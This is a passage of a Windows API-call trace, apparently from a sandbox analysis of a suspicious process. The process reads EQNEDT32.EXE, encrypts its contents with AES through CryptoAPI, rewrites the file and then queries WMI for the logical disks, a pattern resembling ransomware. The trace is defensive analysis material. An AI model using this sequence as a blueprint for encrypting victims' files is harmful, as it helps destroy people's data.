lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", lpFilePart=0x0) returned 0x44 [0157.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecf8) returned 1 [0157.687] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0157.687] GetFileType (hFile=0x31c) returned 0x1 [0157.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf4) returned 1 [0157.687] GetFileType (hFile=0x31c) returned 0x1 [0157.688] GetFileSize (in: hFile=0x31c, lpFileSizeHigh=0x6d8ee00 | out: lpFileSizeHigh=0x6d8ee00*=0x0) returned 0x84a48 [0157.688] ReadFile (in: hFile=0x31c, lpBuffer=0x872fd60, nNumberOfBytesToRead=0x84a48, lpNumberOfBytesRead=0x6d8edac, lpOverlapped=0x0 | out: lpBuffer=0x872fd60*, lpNumberOfBytesRead=0x6d8edac*=0x84a48, lpOverlapped=0x0) returned 1 [0157.976] CloseHandle (hObject=0x31c) returned 1 [0157.976] CryptAcquireContextW (in: phProv=0x6d8ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ed4c*=0xbdf9d0) returned 1 [0157.978] CryptGenRandom (in: hProv=0xbdf9d0, dwLen=0x10, pbBuffer=0x36527ec | out: pbBuffer=0x36527ec) returned 1 [0159.022] CryptImportKey (in: hProv=0xbdf9d0, pbData=0x3982078, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ed1c | out: phKey=0x6d8ed1c*=0xb7f510) returned 1 [0159.022] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0159.023] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0159.023] CryptDuplicateKey (in: hKey=0xb7f510, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ed0c | out: phKey=0x6d8ed0c*=0xb7ef90) returned 1 [0159.023] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0159.023] CryptSetKeyParam (hKey=0xb7ef90, dwParam=0x4, pbData=0x3982158*=0x1, dwFlags=0x0) returned 1 [0159.023] CryptSetKeyParam (hKey=0xb7ef90, dwParam=0x1, pbData=0x3982124, dwFlags=0x0) returned 1 [0159.026] CryptEncrypt (in: hKey=0xb7ef90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8b66f88*, pdwDataLen=0x6d8ed78*=0x84a50, dwBufLen=0x84a50 | out: pbData=0x8b66f88*, pdwDataLen=0x6d8ed78*=0x84a50) returned 1 [0159.030] CryptEncrypt (in: hKey=0xb7ef90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3982180*, pdwDataLen=0x6d8ed80*=0x0, dwBufLen=0x10 | out: pbData=0x3982180*, pdwDataLen=0x6d8ed80*=0x10) returned 1 [0159.032] CryptDestroyKey (hKey=0xb7f510) returned 1 [0159.032] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0159.032] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0159.032] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", nBufferLength=0x105, lpBuffer=0x6d8e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", lpFilePart=0x0) returned 0x44 [0159.032] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ece4) returned 1 [0159.032] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x45c [0159.075] GetFileType (hFile=0x45c) returned 0x1 [0159.075] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ece0) returned 1 [0159.075] GetFileType (hFile=0x45c) returned 0x1 [0159.075] WriteFile (in: hFile=0x45c, lpBuffer=0x39827a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6d8ed74, lpOverlapped=0x0 | out: lpBuffer=0x39827a4*, lpNumberOfBytesWritten=0x6d8ed74*=0x20, lpOverlapped=0x0) returned 1 [0159.076] CloseHandle (hObject=0x45c) returned 1 [0159.076] CoTaskMemAlloc (cb=0x20c) returned 0x66a4088 [0159.076] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x66a4088 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0159.077] CoTaskMemFree (pv=0x66a4088) [0159.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6d8e7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.077] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ed20 | out: ppv=0x6d8ed20*=0xb51e34) returned 0x0 [0159.077] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ed18 | out: pAptType=0x6d8ed18*=1) returned 0x0 [0159.077] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ed1c | out: ppvObject=0x6d8ed1c*=0x0) returned 0x80004002 [0159.077] IUnknown:Release (This=0xb51e34) returned 0x1 [0159.078] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e688 | out: ppv=0x6d8e688*=0x6024bc0) returned 0x0 [0159.078] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024bc0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e8a0 | out: ppvObject=0x6d8e8a0*=0x0) returned 0x80004002 [0159.078] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024bc0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e8b4 | out: ppvObject=0x6d8e8b4*=0x60261e0) returned 0x0 [0159.078] WbemDefPath:IUnknown:Release (This=0x6024bc0) returned 0x0 [0159.078] WbemDefPath:IUnknown:QueryInterface (in: This=0x60261e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4d4 | out: ppvObject=0x6d8e4d4*=0x60261e0) returned 0x0 [0159.078] WbemDefPath:IUnknown:QueryInterface (in: This=0x60261e0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e490 | out: ppvObject=0x6d8e490*=0x0) returned 0x80004002 [0159.078] WbemDefPath:IUnknown:AddRef (This=0x60261e0) returned 0x3 [0159.078] WbemDefPath:IUnknown:QueryInterface (in: This=0x60261e0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8ddec | out: ppvObject=0x6d8ddec*=0x0) returned 0x80004002 [0159.078] WbemDefPath:IUnknown:QueryInterface (in: This=0x60261e0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dd9c | out: ppvObject=0x6d8dd9c*=0x0) returned 0x80004002 [0159.078] WbemDefPath:IUnknown:QueryInterface (in: This=0x60261e0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dda8 | out: ppvObject=0x6d8dda8*=0xbdf190) returned 0x0 [0159.078] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf190, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8ddb0 | out: pCid=0x6d8ddb0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0159.078] WbemDefPath:IUnknown:Release (This=0xbdf190) returned 0x3 [0159.078] CoGetContextToken (in: pToken=0x6d8de08 | out: pToken=0x6d8de08) returned 0x0 [0159.078] CoGetContextToken (in: pToken=0x6d8e210 | out: pToken=0x6d8e210) returned 0x0 [0159.078] WbemDefPath:IUnknown:QueryInterface (in: This=0x60261e0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e2a0 | out: ppvObject=0x6d8e2a0*=0x0) returned 0x80004002 [0159.079] WbemDefPath:IUnknown:Release (This=0x60261e0) returned 0x2 [0159.079] WbemDefPath:IUnknown:Release (This=0x60261e0) returned 0x1 [0159.079] CoGetContextToken (in: pToken=0x6d8eb98 | out: pToken=0x6d8eb98) returned 0x0 [0159.079] CoGetContextToken (in: pToken=0x6d8eaf8 | out: pToken=0x6d8eaf8) returned 0x0 [0159.079] WbemDefPath:IUnknown:QueryInterface (in: This=0x60261e0, riid=0x6d8ebc8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8ebc4 | out: ppvObject=0x6d8ebc4*=0x60261e0) returned 0x0 [0159.079] WbemDefPath:IUnknown:AddRef (This=0x60261e0) returned 0x3 [0159.079] WbemDefPath:IUnknown:Release (This=0x60261e0) returned 0x2 [0159.079] WbemDefPath:IWbemPath:SetText (This=0x60261e0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0159.079] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60261e0, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0159.079] WbemDefPath:IWbemPath:GetText (in: This=0x60261e0, lFlags=2, puBuffLength=0x6d8ed48*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed48*=0x20, pszText=0x0) returned 0x0 [0159.079] WbemDefPath:IWbemPath:GetText (in: This=0x60261e0, lFlags=2, puBuffLength=0x6d8ed48*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed48*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0159.079] WbemDefPath:IWbemPath:GetInfo (in: This=0x60261e0, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0159.079] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60261e0, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0159.079] WbemDefPath:IWbemPath:GetInfo (in: This=0x60261e0, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0159.079] WbemDefPath:IWbemPath:GetInfo (in: This=0x60261e0, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0159.079] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60261e0, puCount=0x6d8eccc | out: puCount=0x6d8eccc*=0x0) returned 0x0 [0159.079] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6d8ecb8 | out: puCount=0x6d8ecb8*=0x2) returned 0x0 [0159.079] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecb4*=0xf, pszText=0x0) returned 0x0 [0159.079] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecb4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0159.079] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec68 | out: ppv=0x6d8ec68*=0xb51e34) returned 0x0 [0159.079] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec60 | out: pAptType=0x6d8ec60*=1) returned 0x0 [0159.079] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec64 | out: ppvObject=0x6d8ec64*=0x0) returned 0x80004002 [0159.079] IUnknown:Release (This=0xb51e34) returned 0x1 [0159.080] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e5d0 | out: ppv=0x6d8e5d0*=0x6024be0) returned 0x0 [0159.080] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024be0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e7e8 | out: ppvObject=0x6d8e7e8*=0x0) returned 0x80004002 [0159.080] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024be0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e7fc | out: ppvObject=0x6d8e7fc*=0x6026250) returned 0x0 [0159.080] WbemDefPath:IUnknown:Release (This=0x6024be0) returned 0x0 [0159.080] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026250, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e41c | out: ppvObject=0x6d8e41c*=0x6026250) returned 0x0 [0159.080] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026250, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e3d8 | out: ppvObject=0x6d8e3d8*=0x0) returned 0x80004002 [0159.080] WbemDefPath:IUnknown:AddRef (This=0x6026250) returned 0x3 [0159.080] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026250, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8dd34 | out: ppvObject=0x6d8dd34*=0x0) returned 0x80004002 [0159.080] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026250, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dce4 | out: ppvObject=0x6d8dce4*=0x0) returned 0x80004002 [0159.080] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026250, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dcf0 | out: ppvObject=0x6d8dcf0*=0xbb59b8) returned 0x0 [0159.080] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb59b8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8dcf8 | out: pCid=0x6d8dcf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0159.080] WbemDefPath:IUnknown:Release (This=0xbb59b8) returned 0x3 [0159.080] CoGetContextToken (in: pToken=0x6d8dd50 | out: pToken=0x6d8dd50) returned 0x0 [0159.081] CoGetContextToken (in: pToken=0x6d8e158 | out: pToken=0x6d8e158) returned 0x0 [0159.081] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026250, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e1e8 | out: ppvObject=0x6d8e1e8*=0x0) returned 0x80004002 [0159.081] WbemDefPath:IUnknown:Release (This=0x6026250) returned 0x2 [0159.081] WbemDefPath:IUnknown:Release (This=0x6026250) returned 0x1 [0159.081] CoGetContextToken (in: pToken=0x6d8eae0 | out: pToken=0x6d8eae0) returned 0x0 [0159.081] CoGetContextToken (in: pToken=0x6d8ea40 | out: pToken=0x6d8ea40) returned 0x0 [0159.081] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026250, riid=0x6d8eb10*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8eb0c | out: ppvObject=0x6d8eb0c*=0x6026250) returned 0x0 [0159.081] WbemDefPath:IUnknown:AddRef (This=0x6026250) returned 0x3 [0159.081] WbemDefPath:IUnknown:Release (This=0x6026250) returned 0x2 [0159.081] WbemDefPath:IWbemPath:SetText (This=0x6026250, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0159.081] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6026250, puCount=0x6d8ec90 | out: puCount=0x6d8ec90*=0x2) returned 0x0 [0159.081] WbemDefPath:IWbemPath:GetText (in: This=0x6026250, lFlags=4, puBuffLength=0x6d8ec8c*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec8c*=0xf, pszText=0x0) returned 0x0 [0159.081] WbemDefPath:IWbemPath:GetText (in: This=0x6026250, lFlags=4, puBuffLength=0x6d8ec8c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec8c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0159.081] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec90 | out: ppv=0x6d8ec90*=0xb51e34) returned 0x0 [0159.081] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec88 | out: pAptType=0x6d8ec88*=1) returned 0x0 [0159.081] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec8c | out: ppvObject=0x6d8ec8c*=0x0) returned 0x80004002 [0159.081] IUnknown:Release (This=0xb51e34) returned 0x1 [0159.082] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e8b0 | out: ppv=0x6d8e8b0*=0x601f3f0) returned 0x0 [0159.082] WbemLocator:IUnknown:QueryInterface (in: This=0x601f3f0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8eac8 | out: ppvObject=0x6d8eac8*=0x0) returned 0x80004002 [0159.082] WbemLocator:IClassFactory:CreateInstance (in: This=0x601f3f0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8eadc | out: ppvObject=0x6d8eadc*=0x6024bf0) returned 0x0 [0159.082] WbemLocator:IUnknown:Release (This=0x601f3f0) returned 0x0 [0159.082] WbemLocator:IUnknown:QueryInterface (in: This=0x6024bf0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e6fc | out: ppvObject=0x6d8e6fc*=0x6024bf0) returned 0x0 [0159.082] WbemLocator:IUnknown:QueryInterface (in: This=0x6024bf0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e6b8 | out: ppvObject=0x6d8e6b8*=0x0) returned 0x80004002 [0159.082] WbemLocator:IUnknown:AddRef (This=0x6024bf0) returned 0x3 [0159.082] WbemLocator:IUnknown:QueryInterface (in: This=0x6024bf0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8e014 | out: ppvObject=0x6d8e014*=0x0) returned 0x80004002 [0159.082] WbemLocator:IUnknown:QueryInterface (in: This=0x6024bf0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dfc4 | out: ppvObject=0x6d8dfc4*=0x0) returned 0x80004002 [0159.082] WbemLocator:IUnknown:QueryInterface (in: This=0x6024bf0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dfd0 | out: ppvObject=0x6d8dfd0*=0x0) returned 0x80004002 [0159.082] CoGetContextToken (in: pToken=0x6d8e030 | out: pToken=0x6d8e030) returned 0x0 [0159.082] CoGetContextToken (in: pToken=0x6d8e438 | out: pToken=0x6d8e438) returned 0x0 [0159.082] WbemLocator:IUnknown:QueryInterface (in: This=0x6024bf0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4c8 | out: ppvObject=0x6d8e4c8*=0x0) returned 0x80004002 [0159.082] WbemLocator:IUnknown:Release (This=0x6024bf0) returned 0x2 [0159.082] WbemLocator:IUnknown:Release (This=0x6024bf0) returned 0x1 [0159.082] CoGetContextToken (in: pToken=0x6d8eaa8 | out: pToken=0x6d8eaa8) returned 0x0 [0159.082] CoGetContextToken (in: pToken=0x6d8ea08 | out: pToken=0x6d8ea08) returned 0x0 [0159.082] WbemLocator:IUnknown:QueryInterface (in: This=0x6024bf0, riid=0x6d8ead8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6d8ead4 | out: ppvObject=0x6d8ead4*=0x6024bf0) returned 0x0 [0159.082] WbemLocator:IUnknown:AddRef (This=0x6024bf0) returned 0x3 [0159.082] WbemLocator:IUnknown:Release (This=0x6024bf0) returned 0x2 [0159.083] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6026250, puCount=0x6d8ec6c | out: puCount=0x6d8ec6c*=0x2) returned 0x0 [0159.083] WbemDefPath:IWbemPath:GetText (in: This=0x6026250, lFlags=8, puBuffLength=0x6d8ec68*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec68*=0xf, pszText=0x0) returned 0x0 [0159.083] WbemDefPath:IWbemPath:GetText (in: This=0x6026250, lFlags=8, puBuffLength=0x6d8ec68*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0159.083] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6d8eb44 | out: ppv=0x6d8eb44*=0x6024c00) returned 0x0 [0159.083] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6024c00, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6d8ebd8 | out: ppNamespace=0x6d8ebd8*=0x603305c) returned 0x0 [0160.066] 